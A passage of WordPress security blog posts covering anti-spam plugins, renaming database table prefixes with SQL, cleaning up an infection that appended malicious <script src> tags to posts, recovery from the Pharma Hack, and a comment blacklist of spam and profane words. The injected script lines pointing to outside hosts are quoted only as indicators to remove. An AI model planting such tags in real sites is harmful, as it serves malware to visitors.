Takes a different approach by adding a randomly generated stylesheet URL to your theme. When that URL is requested by the browser, a cookie is set that is required for the visitor/user to leave a comment. The plugin homepage is kinda thin, so scan the WordPress Forum to gain more insight about this remarkable plugin.

Did You Pass Math?

Requires the user to solve a simple math problem, like “what’s 1+2?” If they can’t do it, they’re considered a bot and the comment is blocked. Simple yet effective anti-spam plugin with nothing to configure – just set and forget.

JSSpamBlock

Uses JavaScript to filter out spam bots and their filthy comments. Legitimate users prove their identity by entering a given number. Provides fallback for non-JavaScript visitors.

Peter’s Custom Anti-Spam

A full-featured CAPTCHA-based anti-spam plugin for WordPress. Requires all commentators to identify a random word before comment submission. Words are displayed as images and are completely customizable. Features: random font display, no cookies required, no JavaScript required, auto-generated audio for visually impaired users, selective blocking of trackbacks and pingbacks, and much more. First choice for full-flavored CAPTCHA plugin.

reCAPTCHA Plugin

Displays words from old books that users must correctly interpret. Uses the popular reCAPTCHA service that is used on popular sites such as Twitter, Facebook, and StumbleUpon. Upside: use of this service helps to digitize old books. Downside: requires a key to work.

Referrer Bouncer

Referrer Bouncer provides powerful protection against referrer spam. Easy to use and requires no configuration. As it says, “It is like the strong silent bouncer at your favorite club.” The instant cure for the referrer spam that ails you.

Simple Trackback Validation

Solid protection against trackback spam. Trackback validation is done with an IP/referrer check and by checking the trackback page for your URL. Bottom line: an excellent solution for stopping trackback spam. Includes Settings Page for easy configuration, including the option to delete or spam blocked trackbacks.

Spam Free

Spam Free is an “extremely powerful anti-spam plugin for WordPress that eliminates comment spam, including trackback and pingback spam.” Spam Free has many features, including no CAPTCHA required for site visitors, a spam-free contact form, and dashboard counter with blocked spam count.

Word Verify

CAPTCHA-based anti-spam plugin that requires the user to enter a simple word in plain text (rather than an image). This makes it much easier for users to get it right the first time, while filtering out lots of automated spam. This plugin is probably best for smaller sites and blogs, as they aren’t generally targeted by the heavier OCR-capable spambots. Or so the thinking goes. Includes Settings Page for basic configuration.

WP-HashCash

CAPTCHA-based anti-spam plugin that claims to be 100% effective at blocking all spam and no real comments. Also blocks most pingback & trackback spam. Features Settings Page for statistics and configuration. And a huge bonus, WP-HashCash is “100% standards compliant XHTML 1.1 and works with both jQuery and Prototype.”

Note that the book now contains an abbreviated version of this list, along with sidebar mentions of some of the other plugins sprinkled throughout the various chapters. Going through this list again for the post, it was great seeing the wide variety of sites and personalities involved in keeping WordPress spam-free. If you know of any good anti-spam plugins that we missed, feel free to share them in the comments.

© 2011 Digging into WordPress | Permalink | 20 comments | Add to del.icio.us | Post tags: comments, spam

By default, during installation, WordPress creates the database with all of the tables prefixed with “wp_”. There are 11 tables created in the default installation procedure, and all of them will prefixed with wp_:

Install WordPress out-of-the-box and that’s what you’re going to get. And would-be attackers understand this perfectly. Automated scripts that target the WordPress database aim for these default table names during their attacks. I think it’s fair to assume that a vast majority of WordPress databases are using the default wp_ prefix. This is bad because it makes attacking WordPress sites easier for the bad guys.

Fortunately you can improve your site’s security by changing the default table prefix to something completely random and unique. There are two ways to change your database prefix: the easy way and the hard way. Which you use will depend on if you’ve already installed your WordPress site or not..

Changing default table prefix before installing WordPress

First let’s look at the easy way. Before installing WordPress, while configuring the wp-config.php configuration file with your database credentials, scroll down the file a bit until you see this:

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

Just replace the “wp_” with a string of random, unique characters and you’re all set: continue with the installation as normal and your database prefix will have been changed to something more secure. Here’s an example of a strong database prefix generated at Random.org:

wp_VzQCxSJv7uL_

Notice two things that will help keep your database nice and organized:

1. begin the prefix with “wp_” so the tables appear in order among other tables
2. end the prefix with an underscore (“_”) so the actual table names (e.g., posts, users, meta) stand out and are easily recognizable.

But really you can use whatever prefix you want – the take-home message here is that you should obscure your tables’ prefix and it’s easiest to do before installing WordPress.

But wait! I’ve already installed WordPress and have been using it for all sorts of stuff.. is it still possible to change my prefix? Absolutely there is, but it takes quite a bit more time to get it done.

Changing default table prefix after installing WordPress

If you’ve already installed WordPress and want to change your database prefix, you’re stuck with the hard way. But it’s really not that hard, just hard compared to changing a single line in your wp-config.php (as shown above). To change your prefix after installing, set aside around ten minutes and follow these steps:

Step 1: Preparations

Before changing your table prefix, make sure you have a recent backup and about 10 minutes of downtime for your site. It may be a good idea to redirect visitors to a temporary maintenance page.

Step 2: Change table prefix

Change your database table prefix in wp-config.php from wp_ to something more secure, like wp_VzQCxSJv7uL_ or something.

Step 3: Change all WordPress database tables

Go to your database (using phpMyAdmin or whatever) and rename all WordPress table prefixes from wp_ to whatever you specified in your wp-config.php file. Here are SQL commands to rename the 11 default WordPress tables:

RENAME table `wp_commentmeta` TO `wp_VzQCxSJv7uL_commentmeta`;
RENAME table `wp_comments` TO `wp_VzQCxSJv7uL_comments`;
RENAME table `wp_links` TO `wp_VzQCxSJv7uL_links`;
RENAME table `wp_options` TO `wp_VzQCxSJv7uL_options`;
RENAME table `wp_postmeta` TO `wp_VzQCxSJv7uL_postmeta`;
RENAME table `wp_posts` TO `wp_VzQCxSJv7uL_posts`;
RENAME table `wp_terms` TO `wp_VzQCxSJv7uL_terms`;
RENAME table `wp_term_relationships` TO `wp_VzQCxSJv7uL_term_relationships`;
RENAME table `wp_term_taxonomy` TO `wp_VzQCxSJv7uL_term_taxonomy`;
RENAME table `wp_usermeta` TO `wp_VzQCxSJv7uL_usermeta`;
RENAME table `wp_users` TO `wp_VzQCxSJv7uL_users`;

If there are other WordPress-related tables from plugins or whatever, just rename them too. The goal here is to rename all of the tables that begin with the default prefix. If you’re using something like phpMyAdmin to interface with your database, you can execute multiple commands at the same time, so edit the above code with your table prefix, paste it into the SQL field, and WHAM! – all tables changed in the blink of an eye.

Step 4: Edit the WordPress options table

Now search the options table for any instances of the old prefix. To do this, enter the following SQL query:

SELECT * FROM `wp_VzQCxSJv7uL_options` WHERE `option_name` LIKE '%wp_%'

That search will return the wp_user_roles option along with any other options created by plugins, custom scripts, etc. The goal here is to rename any options that begin with wp_ to the new prefix.

Step 5: Edit the usermeta table

Now search the usermeta for all instances of the old wp_ prefix. Here is an SQL command to accomplish this:

SELECT * FROM `wp_VzQCxSJv7uL_usermeta` WHERE `meta_key` LIKE '%wp_%'

Executing that query on a recently installed WordPress database, the following usermeta fields were returned:

The number of fields that you need to rename may vary depending on plugins and other factors, but as before, just remember to rename any entry that begins with the default WordPress table prefix, wp_.

Final Step: Test, backup, and done!

Ideally at this point, all instances of the old table prefix (wp_) have been replaced with the new (wp_VzQCxSJv7uL_ in our example). Once this is done, go check your site for proper functionality. Test the Admin, pages, posts, search, and everything else you can think of (or have time for). If your site seems to be working as before, chances are good that the surgery was a success. Now make another database backup for good measure.

Wrap Up

Securing WordPress involves securing your database. The default table prefix is well-known and targeted by nefarious scumbags across the Web. Changing your prefix to something obscure and difficult to guess is an easy way to stop automated attacks, malicious scripts, and other evilness from compromising your precious database. And remember – always, always, always keep recent backups. If something goes awry with your database, the easiest way to restore sanity is to upload a recent backup and call it done.

© 2010 Digging into WordPress | Permalink | 29 comments | Add to del.icio.us | Post tags: config, database

• Visitors viewing posts on your blog may be redirected to a third-party site.  This may be a site already blocked by Google.
• Visitors may  also be forwarded to the domain googlesearch.com, which has already been disabled.

They provide steps for clearing things up, but it doesn’t look like the entry-point or source of this hack is known at this point.

The hack injects a short JavaScript string into your database at the end of each your post’s content. There are (so far) two known variations of the inserted garbage:

• <script src="http://ae.awaue.com/7"></script>
• <script src="http://ie.eracou.com/3"></script>

To clean this up asap, backup your database and run the following SQL queries:

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ae.awaue.com/7"></script>', '');

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ie.eracou.com/3"></script>', '');

And remember to change the query prefix from wp_ to your custom prefix.

© 2010 Digging into WordPress | Permalink | 65 comments | Add to del.icio.us | Post tags: database, hack, mt

• Pharma Hacked
• Security Lockdown

Pharmaceutical Apocalypse

A few weeks ago, DigWP.com was hit with the so-called Pharma Hack. We discovered the hack after some Google results turned up all sorts of spammy pharmaceutical garbage littered throughout posts, links, and titles. The tricky part about the hack is that it injects the spam garbage only when your site’s pages are requested by a search bot (e.g., googlebot). So when you view your pages in a browser, everything seems perfectly normal. Put simply, the hack is cloaked. We had no idea anything was wrong until about two weeks after the attack. During that time a majority of our search engine results were nuked with evil pharma spam. Ick.

Flash forward three weeks later and things are locked-down tight. The Pharma Hack has not returned, and most of the spam garbage in the search results has been filtered out and replaced with clean pages. At the time of the attack, DigWP was running WordPress 2.9/3.0 without any sort of additional site security. We were just using whatever “default” protection available from either WordPress or Media Temple. After detecting the hack, several days were spent cleaning it up and locking things down. At first, it seemed like an impossible hack to fix – nothing seemed to work. We ran through the following routine, hoping to fix it:

• Locate and remove hacked 404.php file
• Locate and remove hacked content from database
• Replace entire set of salt keys
• Upload new WordPress files
• Restore previous versions of other files
• Restore database to previous version

These actions alleviate the symptoms, but they don’t even touch the actual virus, which somehow regenerates the (base64) encoded spam script. As far as we know, the Pharma Hack works like this:

1. Evil script gains access to your WordPress site
2. Encoded spam script injected into database
3. Script inserts spam garbage into pages requested by search bots
4. Script makes no changes to pages requested by browsers

Within the database, the spam script is generated in any/all of these option_name fields:

• class_generic_support
• widget_generic_support
• wp_check_hash
• ftp_credentials
• rss_[string] e.g.,
rss_7988287cd8f4f531c6b94fbdbc4e1caf

If these fields are present and contain super-long strings of encoded gibberish, your site’s infected. You can assess the damages by examining the search results for your site (note: other spam keywords may be used):

site:digwp.com cipro OR meridia OR cialis

If you’re hit, hopefully you catch it before googlebot crawls along. But even if you have thousands of hacked pages appearing in the search index, it’s not too late to clean things up and secure your site. Here is how we did it..

WordPress Security Lockdown

This security strategy is best implemented on new sites. It just makes everything (like renaming table prefixes) so much easier. Either way, you want to start with a clean batch of files. Upload a fresh copy of WordPress, update your plugins, theme files, and so on. You may want to redirect visitors to a maintenance page while you work on your site. That said, here is our five-step Security Lockdown for WordPress:

1. File Permissions
2. File Protection
3. Database Protection
4. Essential Plugins
5. Important Details

[1] File Permissions

After uploading fresh files, the next step is to ensure proper file permissions. WordPress defaults to 644 for files and 755 permissions for folders. Make sure these are set properly. While cleaning up, we noticed some crazy permission settings for sensitive files. For example, wp-config.php was set to 777 – executable and writable by the entire world!! Make sure you don’t see anything like that, and if you do, fix it.

[2] File Protection

In addition to setting proper file permissions, we can also lock down key files with .htaccess. There are numerous files to protect, perhaps most importantly the wp-config.php file, which contains your database login information. Place the following code in your site’s root .htaccess file to protect it:

# SECURE WP-CONFIG.PHP
<Files wp\-config\.php>
 Order Deny,Allow
 Deny from all
</Files>

You may also want to password-protect your wp-admin directory, but it may cause more trouble than it’s worth.

[3] Database Protection

Changing the default table prefix is one of the best ways to protect your database. Malicious scripts need targets, and default targets are easy to hit. Change wp_ to something more like a password. Some random string like “crUQZPadESeKSy8Q_” will make your tables difficult to hit. Like having a built-in password for your database :)

There are two ways to change your prefixes: the easy way and the hard way. The easy way is to add the following line to your wp-config.php file before installing WordPress (important: change the random string to something unique):

$table_prefix  = 'crUQZPadESeKSy8Q_'; // custom table prefix

Do that before running the install script and WordPress takes care of the prefix naming automagically when it creates the database. Going forward, there is no reason not to change default prefixes for all future WordPress installs. For existing sites, you can do it the hard way using a plugin or doing it manually.

[4] Essential Plugins

After exploring the vast crop of WordPress security plugins, we narrowed it down to four plugins that collectively do just about everything in the easiest way possible:

WP File Monitor

This plugin tracks changes made to your files. If/when anything changes, it notifies you via Admin Dashboard alert and/or email alert. So anytime a file is changed, moved, added, or removed, WP File Monitor lets you know. Here is a list of features:

• Monitors file system for added/deleted/changed files
• Sends email when a change is detected
• Multiple email formats for alerts
• Administration area alert to notify you of changes in case email is not received
• Ability to monitor files for changes based on file hash or timestamp
• Ability to exclude directories from scan
• Site URL included in notification email in case plugin is in use on multiple sites

This is one of my favorite plugins. It’s perfect for keeping an eye on things. If anyone gets in and messes around with your files, you’ll know about it immediately, and even better, you’ll know exactly which files have been affected.

WP Security Scan

This plugin scans your WordPress installation for security vulnerabilities and suggests corrective actions. The scan report informs you of any problems with file permissions, system variables, and much more:

• Passwords
• File permissions
• Database security
• Version hiding
• WordPress admin protection/security
• Removes WP Generator META tag from core code

WP Security Scan also provides a nice summary of server information and latest scan information. Performing a new scan is immediate with the click of a button. Very easy.

Ultimate Security Check

This plugin provides even more security information, helping you to identify potential issues with your WordPress installation. It scans your site for “hundreds of known threats,” and then “grades” your level of site security. Here are some of the key things it checks:

• Checks for updates
• Checks configuration file
• Checks if config file is located in unsecured place
• Checks presence of install script
• Checks server configuration
• Checks database
• Checks code

And quite a bit more. The best part about Ultimate Security Check is that it’s so easy to use.

Secure WordPress

This plugin takes care of all those “little” things. Instead of installing a bunch of smaller plugins or custom functions for this stuff, the Secure WordPress plugin does it all for you:

1. Removes error-information on login-page
2. Adds index.php plugin-directory (virtual)
3. Removes the wp-version, except in admin-area
4. Removes Really Simple Discovery
5. Removes Windows Live Writer
6. Remove core update information for non-admins
7. Remove plugin-update information for non-admins
8. Remove theme-update information for non-admins (only WP 2.8 and higher)
9. Hide wp-version in backend-dashboard for non-admins
10. Block Bad Queries

Having all of this (and much more) done with a few clicks in the WordPress Admin is easy and effective.

[5] Important Details

The previous four steps comprise the majority of our security lockdown, but there are some important details to consider:

• Keep your WordPress install, plugins, themes, and scripts updated with current versions
• Use strong passwords and change them often
• Disable user registration if not needed/used for your site
• Check roles and permissions for all users
• Clean up and consolidate old/loose files
• Remove unused plugins and themes
• Check permissions of upload, upgrade, and backup directories
• Keep a backup of your site files
• Keep your database optimized and backed up

We did these things here at DigWP.com, but certain tips may not apply to every site. As a side note, despite our new security lockdown, I am still concerned/confused about how to handle the upload, upgrade, and backup directories. It seems dangerous to leave these folders set with 777 permissions, and for many shared hosts, that seems to be the required setting. I would be interested in hearing any ideas about securing these directories.

Bottom Line

There is no such thing as perfect security. If someone wants in bad enough, they’re going to find a way, despite your best efforts at staying secure. Fortunately, most malicious scripts target the least common denominator, default WordPress installs. At the very least, ensure proper file permissions, secure wp-config.php, and use unique database prefixes. Together, these three steps will put your site out of reach for a vast majority of malicious scripts and other automated attacks. Of course, there are many other ways to strengthen your site’s security, depending on how far you want to go with it. The lockdown strategy presented in this article provides strong security in the most efficient way possible, but there is always room for improvement, so share your ideas and help the community secure their WordPress.

© 2010 Digging into WordPress | Permalink | 44 comments | Add to del.icio.us | Post tags: database, hacking, plugin

The book begins with some general information and then immediately gets into explaining everything you need to know. Throughout the book, John covers everything from backing up and upgrading to blocking bad queries and hiding sensitive information. Along the way, you will learn many tricks and techniques for securing your WordPress-powered site, including htaccess code, WordPress plugins, and much more.

Here are some of the highlights of WordPress Defender:

• Essential best practices
• Kick-ass security plugins
• Creating tripwires with htaccess
• How to hide sensitive information
• How to setup and connect with SSL

..and of course much more. WordPress Defender is WordPress security for the masses. Seriously, I think that just about everyone using WordPress will benefit from this book. Plus, John’s easy-going, laid-back writing style makes you feel right at home as he walks you through the many different ways of protecting your site. If you use WordPress and need to know more about how to protect your site against villains, you need to get WordPress Defender.

Special 50% discount on the e-book today through March 3rd!

© 2010 Digging into WordPress | Permalink | 3 comments | Add to del.icio.us | Post tags: Links, Security

(Caution: the blacklist contains several instances of profanity in order to keep vile language out of your comments.)

Custom WordPress Comment Moderation Blacklist

The idea is simple: copy and paste this custom blacklist into the Comment Moderation field in your WordPress Admin area, which will look something like this:

The ‘Comment Moderation’ field in the WordPress ‘Discussion Settings’ Area

Here is the list, in all of its offensive pharmaceutical, gambling, sex-industry glory (see notes afterward for more information on usage and functionality):

д
и
ж
Ч
Б
. ,
? ,
[url=
[/url]
thx
sex
byob
nude
loan
debt
poze
bdsm
soma
visa
hotel
paxil
anime
naked
poker
coolhu
cialis
incest
casino
dating
payday
rental
ambien
holdem
cialis
adipex
booker
youtube
myspace
advicer
flowers
finance
freenet
-online
shemale
meridia
cumshot
trading
adderall
gambling
roulette
top-site
mortgage
pharmacy
dutyfree
ownsthis
duty-free
insurance
ringtones
insurance
blackjack
hair-loss
bllogspot
baccarrat
thorcarlson
jrcreations
credit card
macinstruct
hydrocodone
leading-site
slot-machine
carisoprodol
ottawavalleyag
cyclobenzaprine
discreetordering
aceteminophen
augmentation
enhancement
phentermine
doxycycline
citalopram
cephalaxin
vicoprofen
lorazepam
oxycontin
oxycodone
percocet
propecia
tramadol
propecia
percocet
cymbalta
lunestra
fioricet
lesbian
lexapro
valtrex
titties
xenical
meridia
levitra
vicodin
ephedra
lipitor
breast
cyclen
viagra
valium
hqtube
ultram
clomid
cyclen
vioxx
zolus
pussy
porno
xanax
bitch
penis
pills
male
porn
dick
cock
tits
fuck
shit
gay
ass
gdf
gds

As mentioned, to use this list, just copy/paste into your Comment Moderation field and you’re done. Along the way, you may find that additional terms are needed, or that certain terms need removed. Feel free to tweak according to the specific needs of your site. It’s all good :)

A couple of notes about this blacklist:

• The first five or so characters are effective at blocking 99% of nonsensical Russian spam.
• The period/comma entries block a recent rash of spam that included these particular strings.
• Most of the terms are highly specific to spam comments and should keep false positives at a minimum.
• Even so, it is recommended that this custom blacklist be used as a “Comment Moderation” list and not as a “Comment Blacklist” in order to retain your ability to screen for false positives.
• Additional terms are easily added by appending the list with the character string on its own line.
• It would be great to build this blacklist up a little further. If you have your own distinct collection of terms, let me know and I will add them to the list.

Any questions/comments/concerns welcome in the comments area.

© 2010 Digging into WordPress | Permalink | 14 comments | Add to del.icio.us | Post tags: blacklist, comments, Security, spam